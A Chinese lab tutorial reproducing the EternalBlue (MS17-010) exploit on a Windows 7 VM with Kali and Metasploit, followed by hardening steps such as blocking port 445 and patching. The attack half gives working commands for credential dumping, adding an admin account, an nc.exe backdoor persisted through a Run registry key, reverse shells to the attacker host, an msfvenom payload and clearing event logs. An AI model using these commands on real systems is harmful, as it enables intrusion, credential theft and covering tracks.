Kali-MSF-永恒之蓝漏洞复现(ms17_010_eternalblue)

2024-09-02 18:04

本文主要是介绍Kali-MSF-永恒之蓝漏洞复现(ms17_010_eternalblue),希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

目录

一、漏洞利用

1.主机发现

2.msf拿取shell

3.获取屏幕

4.文件上传

5.文件下载

6.远程登录

7.上传后门

nc利用

法一:目标主动(推荐)

法二:目标被动(该方法需要msf协助,有点本末倒置)

8.免杀

9.清除日志

二、预防策略

1.打开防火墙

2.安装杀毒软件

3.禁用445端口

使用防火墙新增规则,禁用端口

关闭server服务

 关闭不必要的服务

4.IPsec关闭高危端口

添加筛选器列表

添加筛选器操作

​编辑 添加成功

 5.注册表关闭445端口

6.打补丁


实验环境:windows7

首先关闭防火墙

目标靶机ip地址为192.168.31.89

 

一、漏洞利用

1.主机发现

nmap -sP 192.168.31.0/24

2.msf拿取shell

use exploit/windows/smb/ms17_010_eternalblue
set rhost 192.168.31.89
run

输入shell,拿到系统权限,再输入chcp 65001解决乱码

3.获取屏幕

meterpreter > screenshot   #屏幕截图

 

4.文件上传

新建文件

upload user.txt c://

 

5.文件下载

download c://1.txt

6.远程登录

使用命令打开目标靶机的3389端口,远程登录端口

meterpreter > run post/windows/manage/enable_rdp  //启用目标主机的3389端口远程桌面
meterpreter > idletime  //查看远程用户的空闲时长,空闲时间长再进行远程登陆,减小被发现的风险。
rdesktop 192.168.31.89 

创建一个用户

meterpreter > shell            #进入命令行
net user kill 123 /add         #新建用户kill 密码123
net  localgroup  administrators kill /add #将用户kill添加到Win7的本地管理员组中,获得管理员权限
net user               #查看用户

使用kiwi模块查看登录密码

meterpreter > load kiwi //加载kiwi模块
Loading extension kiwi...Success.
creds_all  #列举所有凭据
exit   #退出

 连接成功

但是这里有个问题,就是创建一个账户并登录后会挤掉原本的账户登录

7.上传后门

上传“瑞士军刀”,保证随时可以建立shell连接

upload /usr/share/windows-binaries/nc.exe  C:\\Windows   

 这里强调要上传的Windows目录也就是系统自带目录,否则后门连接会因权限不足或切换账号而失败

 

nc利用

法一:目标主动(推荐)

向注册表中插入一条记录,使得目标靶机开机后启动nc.exe,将7777端口暴露

reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v lltest_nc -d 'C:\windows\nc.exe -Ldp 4444 -e cmd.exe'

 加入防火墙规则,以保证目标机开启防火墙后仍然可以访问到后门

 netsh firewall add portopening TCP 4444 "kill" ENABLE ALL 

 

 成功连接后门

法二:目标被动(该方法需要msf协助,有点本末倒置)

客户端

nc -lnvp 1234 #开启本地1234端口监听反弹过来的shell

 

 服务端

使用msf强行将shell反弹到kali

nc.exe -e cmd.exe 192.168.1.2 1234 #将cmd.exe发送到kali的1234端口

 

8.免杀

使用msf的msfvenom木马生成功能生成

msfvenom -p windows/meterpreter/reverse_tcp lhost=10.4.7.139 lport=4444 -f exe -o shell.exe
#将shell反弹到kali的4444端口

 

upload /usr/share/windows-binaries/nc.exe c:\\Windows\\addins
upload shell.exe c:\\Windows\\addins

 

 

可以看到360和火绒都可以查杀出来

 

9.清除日志

查看系统日志

meterpreter > clearev

 

可以看到日志被清除

 

二、预防策略

  • 打开防火墙,安装杀毒软件。
  • 关闭445端口及不必要的服务。
  • 安装对应补丁。

1.打开防火墙

打开防火墙后永恒之蓝漏洞将无法被利用

 打不进去

2.安装杀毒软件

安装杀毒软件后,例如火绒或者360会自动帮你打补丁,并且会把nc后门给自动屏蔽杀掉

3.禁用445端口

使用防火墙新增规则,禁用端口

防火墙->高级设置->入站规则->新建规则

 

关闭server服务

WIN+R 运行--services.msc

 关闭不必要的服务

比如 网络发现、文件传输、共享、打印、远程连接、远程桌面。

4.IPsec关闭高危端口

在“开始”菜单选择“运行”,输入“gpedit.msc”后回车,打开本地组策略编辑器。依次展开“计算机配置—windows设置—安全设置—ip安全策略,在 本地计算机”,右键创建ip安全策略:

添加筛选器列表

 

添加筛选器操作

 添加成功

 5.注册表关闭445端口

注册表方式关闭445端口,还有防火墙规则方式,cmd命令提示行关闭等等。

WIN+R 运行--regedit 进入注册表:

找到注册表项“HKEY_LOCAL_MACHINE\System\Controlset\Services\NetBT\Parameters”

 选择“Parameters”项,右键单击,选择“新建”——“DWORD值”。(64位  32位根据自己系统需求)

这里选64位

将DWORD值重命名为“SMBDeviceEnabled” 

右键修改"数值数据"的值为0(0代表关闭,1代表打开),点击确定,完成设置 。

最后重启电脑即可关闭445端口。

6.打补丁

补丁网站

Microsoft Update Catalog

这篇关于Kali-MSF-永恒之蓝漏洞复现(ms17_010_eternalblue)的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/1130673

相关文章

Detectorn2预训练模型复现:数据准备、训练命令、日志分析与输出目录

Detectorn2预训练模型复现:数据准备、训练命令、日志分析与输出目录 在深度学习项目中,目标检测是一项重要的任务。本文将详细介绍如何使用Detectron2进行目标检测模型的复现训练,涵盖训练数据准备、训练命令、训练日志分析、训练指标以及训练输出目录的各个文件及其作用。特别地,我们将演示在训练过程中出现中断后,如何使用 resume 功能继续训练,并将我们复现的模型与Model Zoo中的

UMI复现代码运行逻辑全流程(一)——eval_real.py(尚在更新)

一、文件夹功能解析 全文件夹如下 其中,核心文件作用为: diffusion_policy:扩散策略核心文件夹,包含了众多模型及基础库 example:标定及配置文件 scripts/scripts_real:测试脚本文件,区别在于前者倾向于单体运行,后者为整体运行 scripts_slam_pipeline:orb_slam3运行全部文件 umi:核心交互文件夹,作用在于构建真

文章解读与仿真程序复现思路——电力自动化设备EI\CSCD\北大核心《考虑燃料电池和电解槽虚拟惯量支撑的电力系统优化调度方法》

本专栏栏目提供文章与程序复现思路,具体已有的论文与论文源程序可翻阅本博主免费的专栏栏目《论文与完整程序》 论文与完整源程序_电网论文源程序的博客-CSDN博客https://blog.csdn.net/liang674027206/category_12531414.html 电网论文源程序-CSDN博客电网论文源程序擅长文章解读,论文与完整源程序,等方面的知识,电网论文源程序关注python

【CTF Web】BUUCTF Upload-Labs-Linux Pass-13 Writeup(文件上传+PHP+文件包含漏洞+PNG图片马)

Upload-Labs-Linux 1 点击部署靶机。 简介 upload-labs是一个使用php语言编写的,专门收集渗透测试和CTF中遇到的各种上传漏洞的靶场。旨在帮助大家对上传漏洞有一个全面的了解。目前一共20关,每一关都包含着不同上传方式。 注意 1.每一关没有固定的通关方法,大家不要自限思维! 2.本项目提供的writeup只是起一个参考作用,希望大家可以分享出自己的通关思路

【2024 版】最新 kali linux 入门及常用简单工具介绍(非常详细)

一、介绍 kali Linux Kali Linux 是一个基于 Debian 的 Linux 发行版,主要用于数字取证和渗透测试。它预装了大量的安全审计和渗透测试工具,被广泛应用于网络安全领域。 (一)特点 工具丰富:集成了数百种用于渗透测试、漏洞评估、密码破解等方面的工具。开源免费:任何人都可以免费下载和使用,并且可以根据自己的需求进行定制。安全性高:经过严格的安全测试和更新,确保系

Java反序列化漏洞-TemplatesImpl利用链分析

文章目录 一、前言二、正文1. 寻找利用链2. 构造POC2.1 生成字节码2.2 加载字节码1)getTransletInstance2)defineTransletClasses 2.3 创建实例 3. 完整POC 三、参考文章 一、前言 java.lang.ClassLoader#defineClass defineClass可以加载字节码,但由于defineClas

【vulhub】thinkphp5 2-rce 5.0.23-rce 5-rce 漏洞复现

2-rec 1.启动环境  cd /.../vulhub/thinkphp/2-rce # cd进入2-rce靶场文件环境下docker-compose up -d # docker-compose启动靶场docker ps -a # 查看开启的靶场信息 2.访问192.168.146.136:8080网页 3.构造payload http

【漏洞复现】赛蓝企业管理系统 GetJSFile 任意文件读取漏洞

免责声明:         本文内容旨在提供有关特定漏洞或安全漏洞的信息,以帮助用户更好地了解可能存在的风险。公布此类信息的目的在于促进网络安全意识和技术进步,并非出于任何恶意目的。阅读者应该明白,在利用本文提到的漏洞信息或进行相关测试时,可能会违反某些法律法规或服务协议。同时,未经授权地访问系统、网络或应用程序可能导致法律责任或其他严重后果。作者不对读者基于本文内容而产生的任何行为或后果承担

kali linux的安装以及后续操作

目的: 想学下网络安全等方面的知识 所以安装了kali linux 因为里面集成了 很多有用的工具 非常方便 1、应为想要安装VMware里面的虚拟机 所以找一个虚拟镜像就行 下载url: https://www.kali.org/downloads/  这里面可以找到你想要的 我直接下了最新版的 2、下载完了需要验证下iso是不是正确的 shasum kali-linux_XXX

升级kali系统 进入后发现一直蓝屏

因为要出去晚饭 结果回来重启发现 一直蓝屏 感觉可能是升级过程中 什么软件的安装或者配置出了问题 就直接长按电源重启进入恢复模式 选择最新版的recovery Mode 然后输入  dpkg --configure -a 之后reboot重启  一切正常!